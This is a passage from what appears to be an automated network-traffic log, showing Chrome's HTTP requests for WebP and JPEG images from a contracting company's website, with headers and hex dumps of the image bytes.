                                              Last-Modified: Wed, 11 Jan 2023 14:31:47 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 78900
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:21 UTC7931INData Raw: 52 49 46 46 2c 34 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 b8 33 01 00 30 0c 07 9d 01 2a cf 04 a3 03 3e e9 6e ae 50 29 26 a9 aa 27 b3 ab a1 40 1d 09 63 6e 06 31 02 b9 d7 e1 89 c6 6c ed e9 60 79 43 cf fe 7a bd 9a 0a b5 8b ba 0c 8f 6c 3f 6b e9 43 c4 49 b8 7c f6 fc e9 da aa fd 47 a5 b7 6d 7e 04 ef ca e4 2c 26 4d e7 ad 7f ef fd bf b2 46 3c be 67 9e 7f d1 ff c7 e7 7b ff bf b1 1f ee fe 91 3e 81 fd 5f ff 55 e8 7d f3 93 f4 99 f4 a5 f5 cd fe 51 d3 77 eb c9 fe bf 09 03 ff 87 9c cf a1 7f 7d ff c3 c4 3f d0 bd ec 7f 9f ff 99 ef 59 fd 16 69 fe 33 fd cf 36 3f ac ff 0f ff a7 ad 6f bf cf 20 ff 56 fe cb ff d7 a9 97 eb 7f bc 7d 47 ff cf c2 8f 85 ff df e8 83 e5 df ff ff fa 3c b2 76 82 f8 af fc 5f bc bf 05 5f ba 3e b3 77 68 ff ff f6
                                              Data Ascii: RIFF,4WEBPVP8XVP8 30*>nP)&'@cn1l`yCzl?kCI|Gm~,&MF<g{>_U}Qw}?Yi36?o V}G<v__>wh
                                              2024-09-27 06:20:21 UTC8000INData Raw: 93 e5 1a d0 fe 82 68 fa 6f f5 a1 20 69 30 fc 44 59 87 de 84 c4 23 ce 45 81 47 74 7e 0a 7f 1e 58 bb e1 a3 ac 46 0c a5 57 8b cf 4a dc b1 6d fc b0 84 24 ab e2 a2 d5 c2 3a 36 d7 47 fc 9c 90 7c 86 a1 b4 23 db b9 c8 fd 94 e3 0a e1 20 2b 47 c6 93 ab d0 3c 25 10 17 80 9f 3b ae e9 c8 42 9d 9c 28 2b e9 a6 82 bb ec df 02 97 47 2c 0e 4c 4a 88 0c 41 3d 29 ba aa e7 6a 4e 60 41 6a bf cb 3b 8e ab ea 11 2a 90 53 45 89 39 a9 10 54 2c ae cd 15 04 1c a5 7a e2 18 ba 17 93 cb 2c 18 ef ec 8e f2 0d 97 d7 e7 dc b3 dd 87 5b 38 0a 45 d8 88 66 05 26 94 5b cd 53 ce 36 0c 1e 0f 4a 96 47 2c d9 f7 d1 d1 9e dd 10 4e 4c 4f 04 25 a8 59 f0 27 84 a7 bc a6 45 b0 1b 8a cc f8 8d ce e8 8e 0d 4e c2 cc 29 d3 bc 05 0b a8 e5 67 df 47 70 f5 43 ff a1 ce 62 2d 31 22 c1 dd d0 1f d4 96 cd b3 69 bc 3f 21
                                              Data Ascii: ho i0DY#EGt~XFWJm$:6G|# +G<%;B(+G,LJA=)jN`Aj;*SE9T,z,[8Ef&[S6JG,NLO%Y'EN)gGpCb-1"i?!
                                              2024-09-27 06:20:21 UTC8000INData Raw: 0c 00 60 6a 43 8e b7 cc e4 69 5a 14 fd dc 4c 16 76 72 f1 17 7a aa 77 c6 70 30 76 c3 ae d7 63 6f a7 40 96 ee 06 d6 5c c3 c7 fa 86 18 03 45 53 e8 d4 1f 1f 01 4b 8e 4f 4c ed 79 d3 a0 b1 63 d0 8c dd ce 20 c7 f9 29 e6 2a 53 0f aa 02 69 9f 41 bb 93 d8 9d a5 50 1f 20 5e 14 2f a0 b4 96 8d 7c a2 7f 95 db 7d ea b2 94 28 41 94 d1 cd 3f 75 1b b2 05 98 85 e3 9f 93 a4 a0 b4 00 00 00 09 ce 47 35 80 00 00 00 00 00 00 00 00 fd 5d 08 28 00 00 01 21 e5 fd f5 77 ae 4b 48 c1 e9 b6 b1 f3 0b f8 a0 04 e5 9b d5 a7 f1 fb 16 26 11 0b cd 6c 72 d9 d8 53 0d 7d 29 e7 01 74 50 d6 8a 55 c2 27 9e da 27 2d ed a3 77 72 33 af 13 0e 16 85 36 cf e4 d8 3c 0f 7f 0b 78 e7 50 91 80 53 ed 94 79 56 01 11 11 f4 72 76 ca eb 4c 18 9d a4 14 7d 4c e4 69 89 a0 00 b9 b8 17 8d d5 72 88 f7 d7 71 c0 5f 85 0b
                                              Data Ascii: `jCiZLvrzwp0vco@\ESKOLyc )*SiAP ^/|}(A?uG5](!wKH&lrS})tPU''-wr36<xPSyVrvL}Lirq_
                                              2024-09-27 06:20:21 UTC8000INData Raw: b7 8e dd 66 83 ca 5d 2b 9c 07 d1 41 4d ee a2 9c f1 e9 fe b0 71 e9 14 73 5d de cd 65 76 8d c9 11 7a 5c 44 d1 fb f0 5d 33 43 7c f7 26 0e ad f4 62 f6 42 98 4a 69 f9 42 95 cd 44 8e d5 f4 eb de 7d 99 77 79 c6 38 7f 15 bd 49 55 03 d8 60 5f 9c fa 7d 28 ab 1c 24 c8 fd 77 2b 32 fa 96 24 9a 14 ca 9a e9 24 1e 09 cd 09 f9 03 e4 4d 59 46 ce 9f db 12 58 b9 21 1d 0e e5 19 ed ad 0c 32 fe a8 84 a0 f1 e2 71 ba 88 ad e8 00 9a 0c f2 7f c3 28 ea 37 db 6b 05 c4 47 f2 dd 96 14 ee 9a c0 05 d0 71 32 61 46 d4 b1 66 51 4b fc 34 10 bf d1 a9 05 fd 0b 54 f1 f6 74 d5 1c 9d d1 96 11 e1 69 ca 77 ce 90 70 5f ff f8 40 18 d2 1a 75 1a 84 8f 5b 0e 76 c7 2a f8 09 f1 17 53 98 92 07 d0 e4 63 c3 ed 41 16 35 d0 b7 d2 6e ea a2 89 f1 d4 85 e2 14 e4 cf 5e 13 e4 d8 c3 d0 c7 50 e5 fc 00 10 b7 4d a4 cd
                                              Data Ascii: f]+AMqs]evz\D]3C|&bBJiBD}wy8IU`_}($w+2$$MYFX!2q(7kGq2aFfQK4Ttiwp_@u[v*ScA5n^PM
                                              2024-09-27 06:20:21 UTC8000INData Raw: d1 fb a5 1d 15 50 9c e3 37 d3 2b 0a 5f 12 a5 a6 a7 d1 36 1e 23 cf 2f 1d 7a 54 f0 0f e7 1d b9 3f 08 f4 c6 cc 64 46 85 15 28 84 85 78 95 4a 7a 2e b0 a3 f6 ee 53 4a 1f 0f 58 ec b4 ad 1c ac 35 c6 ca da 11 74 ab cf e3 9a 84 6e ff 07 34 ca d7 be d6 f4 8d be d9 fe 23 ca a0 f7 b3 2d ed de 5a d0 73 44 ca 93 e0 e8 ef f1 fb c3 ce 9d 9a 3b 2b 81 1d 5b ad c4 76 e3 dd 10 73 28 af 4f 0d 39 59 da a8 5d 3c 96 87 17 9f 9a ae da 59 cd 42 db 9c e3 af 82 2a 9b f6 a6 d1 72 06 b7 21 37 4d da 5f 8a 36 3c eb 35 66 5d 9e 71 b4 c9 2f a9 bb 68 85 05 8f 25 2e 9a a3 8d 62 b3 61 32 14 0c c2 26 39 da f7 c7 02 c1 09 20 53 b2 71 9e 35 2c 9c 3d 06 97 66 92 a0 d1 61 f2 c1 3e 52 4f 92 40 d0 25 81 73 ce 6f 11 14 80 1c b6 3e d4 49 20 c4 c7 e5 69 0e 21 17 9e 38 67 e8 55 51 f0 0f 82 9f eb f3 89
                                              Data Ascii: P7+_6#/zT?dF(xJz.SJX5tn4#-ZsD;+[vs(O9Y]<YB*r!7M_6<5f]q/h%.ba2&9 Sq5,=fa>RO@%so>I i!8gUQ
                                              2024-09-27 06:20:21 UTC8000INData Raw: c4 52 f5 dc c6 c4 1a c1 94 51 5c d7 d6 16 56 7e a5 23 c8 7d ca 9b e0 f2 9b ee 68 a4 f1 b1 ed 17 cc 91 ec 23 b3 2b a8 ce d3 9b f9 0b 55 90 42 16 ec 7e e2 3c 8f 13 a2 c9 e0 bf ef e3 15 8b 9b d2 7b bf e8 66 e1 44 e2 17 94 f5 58 46 be 15 aa d1 65 0d 3f 40 b7 f3 21 8d a5 1e 2f 56 33 c9 a6 06 b1 84 94 bf ce b9 85 8c c8 07 a1 f6 48 af d1 6c d9 27 dd bf fd ac cb 28 45 bf 41 4a 8f af ac b5 60 c7 ff 49 84 f6 c4 de e6 8c 13 68 2f ef 79 cc 8f 41 1f 30 53 37 be 17 74 32 1f c8 b3 ec f4 29 73 4c 90 72 50 45 18 06 19 29 13 e0 fd 61 7a 64 21 b7 57 fc 4f c5 2d 2b 21 f8 ff 10 57 e1 fa 90 fe 4f d7 74 c3 24 63 15 ce 82 cc 30 22 c2 f1 8a 33 e0 de a6 ea 8b b5 0d 1c 85 43 21 53 0d ad bf 31 48 6a 72 8b 5d 70 f6 02 80 0b b2 d5 c6 e6 63 05 9a 39 29 41 ba 04 c7 72 9f a7 a9 08 53 03
                                              Data Ascii: RQ\V~#}h#+UB~<{fDXFe?@!/V3Hl'(EAJ`Ih/yA0S7t2)sLrPE)azd!WO-+!WOt$c0"3C!S1Hjr]pc9)ArS
                                              2024-09-27 06:20:21 UTC8000INData Raw: b5 11 ab be 2c 33 9a d5 5c 42 1c 86 45 20 fc 93 75 92 f0 f1 28 71 d8 11 44 bc 1e c6 0f 35 e5 82 e1 76 cc 24 6d b8 51 2e eb e3 1e bc 3a e6 a7 7e ac 03 03 90 f3 01 a4 bb 74 27 67 32 a9 e8 32 4f 82 44 bb 17 f7 a0 e6 a1 c9 a8 55 48 41 bd d4 f8 df 4e 49 ba eb 5c 02 0a 59 db 31 9d ae 25 83 55 b4 05 bb b9 1c 4b c3 b0 2e 11 a1 a9 79 a9 ea 2f f2 84 35 7a 91 a1 14 45 18 fc 52 24 86 b1 0e 53 5b 63 a0 c1 b0 ee c4 b5 eb 20 f0 a4 fe e8 58 0c ae f7 b9 ad c6 f5 58 01 1a 5c 85 1c 43 7c 96 0d 7d 87 df 5c 45 be 53 99 c2 8f 89 8a e1 2a b2 7b 6e 15 9c 18 b4 96 1a 03 59 7c e8 e9 ad 57 29 3f bf e6 3c 34 08 4e 88 25 2b c7 d3 6c 90 49 8c 9c df 8e ba da a2 da 3d 15 9e 53 f9 e5 f6 dc 75 57 0c bc 9a b8 0d a5 8d 13 cf c9 24 3b 58 9a 35 6e 15 04 ad 71 6d 00 8e 35 6c 70 e7 69 81 eb 41
                                              Data Ascii: ,3\BE u(qD5v$mQ.:~t'g22ODUHANI\Y1%UK.y/5zER$S[c XX\C|}\ES*{nY|W)?<4N%+lI=SuW$;X5nqm5lpiA
                                              2024-09-27 06:20:21 UTC8000INData Raw: 30 b3 f0 bb a6 33 61 6f 9e 7a 87 5c 55 4c 0a db 70 e6 63 9c 80 34 fd 74 26 9b 55 ba ea 96 3f 99 c9 5c 0b 0c 57 14 d6 4f c0 87 89 e8 1b 93 4e 3d 6d 45 7d 01 30 cd f3 f6 88 e5 6a fb ea 74 93 08 db 27 69 f8 d3 ec 60 5c ca b3 b1 34 2d e4 bf a3 79 f6 ff 78 fc 02 bf e1 15 4b f0 19 2f d0 49 3b d7 7e a6 6c fa 82 e7 04 57 df 84 02 af 0e 80 c9 4d 6a 16 33 ec ef 4d 7e a4 3c df d1 ee b3 d9 b6 ba 97 39 b3 e8 90 ce 70 a6 c9 52 39 25 90 d4 d4 f9 72 8a 42 f7 3e 1b e2 ae ec 19 bc 68 2c f3 cf 4e 5a 95 55 c9 cc 7d b1 ae a3 15 55 c2 47 10 d3 79 0d ed d1 bd 95 3b 29 a6 98 d3 7f 43 05 0f 72 20 db e9 19 d2 53 9c d1 35 84 ce 48 79 97 58 5e 96 af c4 c3 59 e7 21 17 07 38 14 71 25 c3 ed bc b4 47 7b 7d 23 4e c9 3a 5b 01 d3 3c b5 2d 1d 16 8b 96 f6 17 28 c6 02 bb cd f5 ff 7c 6b f6 b2
                                              Data Ascii: 03aoz\ULpc4t&U?\WON=mE}0jt'i`\4-yxK/I;~lWMj3M~<9pR9%rB>h,NZU}UGy;)Cr S5HyX^Y!8q%G{}#N:[<-(|k
                                              2024-09-27 06:20:21 UTC8000INData Raw: b6 8b be 94 4d 77 60 26 2e e1 4d 67 8c 45 f2 2f d7 cc 62 ae bc 78 7c 5d 81 6d 8f 06 07 78 4a fe a5 2d 7f 69 0e a8 76 e8 9d 21 6f 57 38 ff ab 06 f0 ec c6 c7 63 89 6e 27 52 9f 2c 9a 34 52 de 98 ea c6 40 f2 cf 4e ed 45 af b9 5e 9f fe 3c 0d 81 00 18 ed 7d a3 1f 60 05 99 97 c7 aa 1a 2d 1a ba 8a 49 3e d6 da 0f 7c e4 06 59 48 b3 0d 33 b1 a6 47 7b 32 3a b1 33 a6 58 60 85 6f f1 d4 d5 88 d6 66 25 12 08 ad e6 f0 dd 3a 31 90 e2 6e 80 7e 47 7e dc aa f7 1a cf 6a db 48 22 21 0a 27 0c d1 19 60 7f 86 25 da 82 95 fb 83 ec bf 17 9f b8 df 73 2d 13 30 06 ca a1 a7 aa fa 5b 3d e2 03 61 d4 f9 a4 f5 4f 3a ef b9 ac 30 6f db f9 ca 58 c9 97 24 73 24 4c 68 58 02 22 44 ba 3c 25 8c c9 48 e5 94 88 45 da 66 57 f3 90 5b 63 20 f1 77 a3 de 6c 6f 7f 50 85 e4 80 75 cc 40 0d 84 23 99 4d e1 ef
                                              Data Ascii: Mw`&.MgE/bx|]mxJ-iv!oW8cn'R,4R@NE^<}`-I>|YH3G{2:3X`of%:1n~G~jH"!'`%s-0[=aO:0oX$s$LhX"D<%HEfW[c wloPu@#M
                                              2024-09-27 06:20:21 UTC6969INData Raw: 74 85 5f f5 a9 42 a2 39 02 57 eb 8f b1 ca d5 c1 bf 68 a3 42 ae ef 14 d2 1c 31 8b 99 3b ab cd a6 a0 37 f2 3a eb ae b9 b8 8a e5 39 e9 ce 34 d7 c5 c8 2f 27 9d 88 f3 cc 79 8c 9d ca 83 95 7d f1 15 78 32 1e 46 ae 0d ba d5 0e 17 39 e2 50 f3 04 36 a8 40 dc 2e bd ae 4e 7d e4 91 88 d0 db 17 51 e7 33 e6 8c 90 e0 d9 0d 3a 11 56 24 90 9b 37 d4 9d e0 69 c9 52 c4 80 7e b3 5a 41 19 70 2e 97 90 b4 21 b9 51 69 90 ae 97 3e 71 a1 ae 0a ba 72 d9 3a 28 0c f1 fd 21 19 98 3c 11 f9 01 ad d9 e0 aa 86 6e 4e 49 e8 8d 8c 67 5d c9 06 02 26 c0 54 4f a5 ce e1 d6 4a 60 34 cf 3e a0 94 56 2c f4 70 f2 d5 27 ed e0 cd 4c fb c0 47 20 3f 9e 51 24 c9 00 cf 96 09 66 7d 76 fc 68 1c 41 ff 3e 41 62 08 a3 75 0c 69 b2 76 05 9d ea ad 47 63 79 c0 71 a7 62 50 99 58 78 22 d3 f7 a5 01 c4 bc 93 aa 27 1d 35
                                              Data Ascii: t_B9WhB1;7:94/'y}x2F9P6@.N}Q3:V$7iR~ZAp.!Qi>qr:(!<nNIg]&TOJ`4>V,p'LG ?Q$f}vhA>AbuivGcyqbPXx"'5


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              129192.168.2.465465173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:21 UTC464OUTGET /uploads/projects/31/4a98fa9bd66caf02803bed595073351f.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:21 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:21 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Sat, 14 Jan 2023 13:23:04 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 465135
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:21 UTC7930INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 62 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Duckydbhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                              2024-09-27 06:20:21 UTC8000INData Raw: f1 ee f7 f7 fd cc fd 26 2a fa f0 ec f9 fa 2e 31 d2 8f af 3f 3c f3 f5 b2 f2 7a 3d 0f c3 eb d7 6e ba da 6c ca 4e 77 61 8d 72 1f 53 e7 7c 89 f5 be 37 cb 7e af 99 6d fd 43 f8 dd c7 93 e9 dc 7e 2f f7 9c a7 f3 ef d8 c5 f5 f3 bb fd 37 c9 b4 e1 eb f1 ff 00 cf fd ff 00 9c 3e 47 d2 fa 03 c3 e1 eb 78 f8 3c d7 b7 6d bd 7b 7c f1 f4 27 44 e7 e9 3c 3a fd 4f 8d f2 3d 24 e9 ae 23 1d ef bd 1c 3c e7 a7 1d 4c 7d 3d df 97 84 f3 e7 e2 ff 00 a1 fc 87 dc 1f b1 fc df 98 fe 2f f4 1e 3b f9 af b3 cf 6b d1 ca fd 5f 1f de 9f b6 f8 bb fd 7e 4b ef 4f 87 d3 fd 5e 38 9a cd ae 35 e5 5f 1b f4 7f 51 7e 43 f7 7c 57 46 dd 79 6b bb 73 e3 7a 59 1d 39 d2 f8 fd 3e 6f e8 e5 d8 fb bc 15 bc 7b cc f6 7c 0b 7f 99 f7 97 e7 7f 67 cf f9 fd 34 13 34 3c af 7b 8e 9d 6f 7f 26 cf df 7e 3f 95 fb 9f 17 f3 8d f1
                                              Data Ascii: &*.1?<z=nlNwarS|7~mC~/7>Gx<m{|'D<:O=$#<L}=/;k_~KO^85_Q~C|WFykszY9>o{|g44<{o&~?
                                              2024-09-27 06:20:21 UTC8000INData Raw: 9f 35 9e f3 b3 58 89 58 1b 97 09 6a b3 b8 b9 b5 52 c5 8b 29 a8 4a e2 2c 43 ca 14 ba cd 26 e9 77 99 24 4b 30 b2 ce 5d 91 5f 63 36 44 f9 51 81 9d 6e 3f 3b 3f a0 7f 3e e1 fa 67 9b ed 79 7e fc e8 f5 76 6b 19 59 b6 f3 cf 59 cf 79 ca cf 66 e1 e4 f6 8f 0f d4 92 d6 25 bf 3e d2 f1 d3 6c b2 97 1a c7 58 9e bb ec dc 45 d6 73 ad 2c c8 b6 3e b3 b7 3a 8b 71 77 3a 48 9a dc b1 d2 c7 1d 2e 39 f6 a9 df 2d 63 96 5a ed 6b a1 c7 6e 57 af 9e 6c af 3a af d4 e7 f5 8a 7d 63 9f b8 8e b4 f2 55 54 68 85 33 19 ad 26 b4 90 d6 19 ba a6 b7 e7 a4 cc 6b 29 42 2e b3 12 f3 8d 64 ec e8 23 5c 4f ce e6 cb 68 93 ee 6e a3 b0 ce fb 9c 75 bd e1 de eb cd e8 ed 7e 17 d7 b5 f1 fa b5 b5 c0 fd 2f 07 1f f4 bc 5e a1 e1 fa 19 79 7d 18 f9 7b 3c ef 4e b3 23 a7 2e bf a6 32 de 61 6a 4d cd 52 d6 e3 74 b2 eb 4c
                                              Data Ascii: 5XXjR)J,C&w$K0]_c6DQn?;?>gy~vkYYyf%>lXEs,>:qw:H.9-cZknWl:}cUTh3&k)B.d#\Ohnu~/^y}{<N#.2ajMRtL
                                              2024-09-27 06:20:21 UTC8000INData Raw: 25 94 7e 44 8d 29 1f c8 7a d0 d8 d4 fc 81 0a 75 a1 e6 b4 57 c7 6c 79 96 a7 35 b5 e6 9c c7 1a 9c b5 9b 98 6a ad 96 f7 b6 6f 8c 61 c2 76 76 35 ef dc 4d fe 3a ed 1b 6a e3 6e b6 fb e1 ad 18 5b 6f 0f bb ad ca 6b e8 d3 cc 78 f5 df ce 71 30 d0 fc 77 47 8c 51 ca ee f2 14 f1 da 95 7e 4b e1 76 b9 0b ad 9d 6b a5 bb 7f c8 fe e4 63 61 6c c9 62 d1 d7 f1 3e 27 9d f1 eb 23 57 1b 7e 8e cf c7 39 15 aa 9d 5d dd 18 59 bd 1d 5f e3 ed fc 71 a1 a5 c4 f9 2f 2f e3 9e 37 7c 97 95 f0 8e 2f 80 5b fc 12 85 d4 da f0 3d be 42 5a 3a 32 85 5a 68 91 fc 85 e4 1a d2 5d 6d fa fb 96 77 38 ee 2e ed f8 9a 7e 4f 1d 24 87 90 f3 a8 6b 79 d7 93 d1 c5 78 e7 37 2e 77 f1 bf e1 da f6 d7 8b fc a9 5f 2b 23 92 ff 00 99 d5 b3 ca ee f9 bc 79 bd ad ff 00 3c af 9e e4 f6 7c e1 77 f9 6b bf 22 47 9c e6 ef fc 8a
                                              Data Ascii: %~D)zuWly5joavv5M:jn[okxq0wGQ~Kvkcalb>'#W~9]Y_q//7|/[=BZ:2Zh]mw8.~O$kyx7.w_+#y<|wk"G
                                              2024-09-27 06:20:21 UTC8000INData Raw: e8 2c 51 78 fb e5 05 d7 b2 b5 ed 09 5a b2 2a a1 fe 39 8b 4e aa 45 32 2e da 8c a1 44 51 49 51 b7 5d ba f7 de 9a 71 f8 b5 c9 2f e3 6a 49 6d 50 b6 f6 ab 94 aa e3 68 b8 87 0f ac ff 00 c3 c2 bb bf e3 72 9a ae 9f 1f a8 6c 72 fe 35 ab 1a f9 4d 5d c2 70 f2 7b a3 57 11 ce 66 be 33 46 cd 3a 7e 1d e3 da a9 1a e3 54 1b 21 21 13 d9 fe e1 54 55 59 2e c6 ee 96 99 df d4 94 2a f3 6d 6d ad 9e 42 fd cf 8b c6 a7 97 46 fe 63 89 d3 e5 8d 5a fc 6b 89 a1 79 fe 0f 4e 57 79 73 96 f9 36 dd 85 9c 9e d5 c4 a3 b7 61 f1 2c 3b 15 22 63 aa 87 c8 bd b5 b9 3b a4 2d b6 11 dd 8c 27 f3 2c 9c ab b9 50 86 cd ca 26 c5 d1 9c f6 92 4b 3d aa 35 92 7b ba 50 48 ce 0f 2f 7b 16 cd d8 2d bc 8d 94 d7 2b ed 42 ab 76 6c ae 1f c9 2d b7 6b 72 5d d6 dc ae 29 b5 c8 cc 84 76 bb 6b f2 1a 3b 3b 10 8d fb 8b 1d 7d
                                              Data Ascii: ,QxZ*9NE2.DQIQ]q/jImPhrlr5M]p{Wf3F:~T!!TUY.*mmBFcZkyNWys6a,;"c;-',P&K=5{PH/{-+Bvl-kr])vk;;}
                                              2024-09-27 06:20:21 UTC8000INData Raw: 87 4a 09 56 bc 4a a8 de da 37 39 3e 0f 89 b3 73 cf b8 bd 64 de 9f 90 73 db 9a 1f 8f ed bc d4 f0 ee 37 56 17 f1 fa b6 a5 5d 9a 65 f3 22 59 b3 5e 9d 73 b3 8f de 85 9b 90 81 2d 8b 6c 85 9e e2 d7 61 19 c9 53 ed 54 4b 10 45 54 5c e0 83 64 4e 48 90 8f 72 70 9c 67 05 67 49 d7 f6 c5 3d e9 d9 b6 10 4d 84 94 51 1c 9c 88 e2 8a b6 d3 12 77 55 15 f9 f4 34 b7 6c b0 96 cc 91 27 35 79 da 77 da 2b 33 e4 20 b6 2c 84 51 1c 84 54 c1 ce d4 e4 76 4e d7 bf c7 53 b5 89 1a e2 a4 be c9 2c d4 8e 06 0a d4 ad f6 5f b9 0b 74 e7 b9 5a 26 d6 ae b6 df 21 77 23 b1 b7 a8 6b 4e cb 0e 07 86 df 9a ff 00 1f 5c ab af 4f 53 5d 31 92 ce 76 ca 2a 95 2c 12 b5 59 4e db 28 51 76 60 95 ad af 29 ed 62 bf c8 53 14 9e da a1 7e e6 4a 9b 12 41 37 14 9e e7 b2 72 49 dd bb 97 4a d2 5b db 16 d7 4d fb ca b7 d1
                                              Data Ascii: JVJ79>sds7V]e"Y^s-laSTKET\dNHrpggI=MQwU4l'5yw+3 ,QTvNS,_tZ&!w#kN\OS]1v*,YN(Qv`)bS~JA7rIJ[M
                                              2024-09-27 06:20:21 UTC8000INData Raw: 11 f7 54 ae 6a 7c 6b 95 7e 35 84 e3 24 e8 8b ec 22 38 c2 bb 11 14 a9 3d e0 aa 85 52 43 4d e0 2d d5 a1 b1 bb 5d 31 db ba 56 5c 33 89 15 7e 92 53 27 11 fa 41 05 89 fd a6 67 75 09 2a 0a 21 f5 46 10 aa 58 1a d2 9a d6 b0 82 9b 1b 15 d2 ab b3 61 0d 9b 90 af 66 c5 55 5f b6 a8 a4 a3 af 55 4b 39 d7 ac 91 4e c1 4a 54 b5 dd 54 65 6d 94 a3 4b 46 b2 aa 59 16 0a f8 ab 24 55 ae 4c 4a 9e 6a 95 4d 45 8c c5 a5 1a d9 a4 0b 36 49 7b af 44 9b 47 45 73 e4 48 fb ac 69 ae 55 59 5c 63 3b b0 a5 63 ff 00 6d 91 22 e8 22 a2 98 b8 b2 c4 4b a0 55 c8 46 24 b6 d2 72 87 22 7f 23 14 17 76 0b 3f 9d 59 2d e8 b7 cb 99 2d 97 3b b1 25 37 58 72 12 6f 97 64 cd 7b 6f 91 09 d8 f1 9e 30 cd 96 db 97 18 4e d1 67 35 36 af d9 98 9d 12 d2 b8 fd 90 8a 22 7d 05 fa 30 c4 50 61 6b 92 a5 83 8e e4 50 ae 13 15
                                              Data Ascii: Tj|k~5$"8=RCM-]1V\3~S'Agu*!FXafU_UK9NJTTemKFY$ULJjME6I{DGEsHiUY\c;cm""KUF$r"#v?Y--;%7Xrod{o0Ng56"}0PakP
                                              2024-09-27 06:20:21 UTC8000INData Raw: 98 a8 b0 42 da d1 23 b6 8a b3 d4 d6 94 cf bc da b2 da 8f 99 1a 85 df d4 52 1b 74 db 6c 34 d3 1d eb 63 a9 39 72 31 53 4e af 95 4e fe ac a3 54 76 a6 fc 7e bd d3 41 c5 8c 51 23 5e 51 44 41 05 f6 3e ab 8a ac 16 12 89 15 59 2b 0c 2a 12 f6 3b 89 12 57 57 02 7c c6 85 52 fe 7b 88 17 c8 38 c3 57 77 5f 71 23 ec 89 d1 84 41 bd 51 64 56 43 65 13 24 18 61 8c 62 a3 0f 18 eb 57 25 d6 8f f2 5b 33 97 cd d9 55 f9 bb 0b 3f 9b bb 97 cf dc 7f e4 37 4f e4 b6 f2 fe 5b 62 0b 3e 6e 09 0f e6 e8 45 8f 3b 06 97 31 74 96 ae 4b 72 73 ef 6c a9 66 fe dc 24 bc b6 dc 4f e6 f6 5d 39 dd a3 f9 ad d7 fe 6b 70 fe 77 6d 4f e7 76 99 39 cd 95 4f e7 76 08 f3 17 c9 51 77 2e 23 ab ec b5 ec 21 77 76 ea 69 d6 86 b5 6a a2 fd 23 62 55 28 ec dc 77 36 64 5b 0b e6 56 b6 56 aa aa 54 99 ac ea aa 29 35 6a ec
                                              Data Ascii: B#Rtl4c9r1SNNTv~AQ#^QDA>Y+*;WW|R{8Ww_q#AQdVCe$abW%[3U?7O[b>nE;1tKrslf$O]9kpwmOv9OvQw.#!wvij#bU(w6d[VVT)5j
                                              2024-09-27 06:20:21 UTC8000INData Raw: 29 0d 11 a0 e2 c7 14 d6 46 e3 f0 46 15 bf 5a 62 54 13 ce d7 bd 63 a2 09 cc f4 bc 0a f6 4f 4a f8 a8 92 54 24 a4 16 69 75 e9 49 40 59 25 2b 2e 4c ae 51 b1 be 55 02 a0 98 d8 d4 12 ca 7a c8 4b cb 62 d6 0a 34 d8 51 fb a9 8c 94 13 2f dd 0a 12 4d 4b 6a 1e c7 bd 39 4f 64 35 6e a3 63 a6 4c 26 a0 54 6c 9d 9b b4 60 5d 36 ae 9a ee 07 cb 74 e1 0e 16 60 42 35 34 d7 8b 32 b1 e5 ef 4c 5b b0 a3 5f 28 e5 25 62 99 54 e3 fb c9 eb 96 c4 c0 07 44 98 07 51 5e 05 7c 05 40 bd 36 35 da 19 ac 75 d8 9d 46 9d 7c cb ec 57 b2 61 2d 43 28 32 30 9a 71 05 04 1e c8 6a 58 a8 cf 5e de 4b a7 ee a3 43 c5 61 b9 3d 33 55 75 20 02 3e 2e d5 95 61 f9 94 66 b1 d5 c4 6c e5 8d de c5 4e d0 b3 c5 62 a7 86 d8 ac dc 36 3d 13 58 79 d7 a0 06 ce c5 ff 00 31 66 2c 10 7d bd 09 9d 35 91 b3 32 80 75 24 e9 db a1
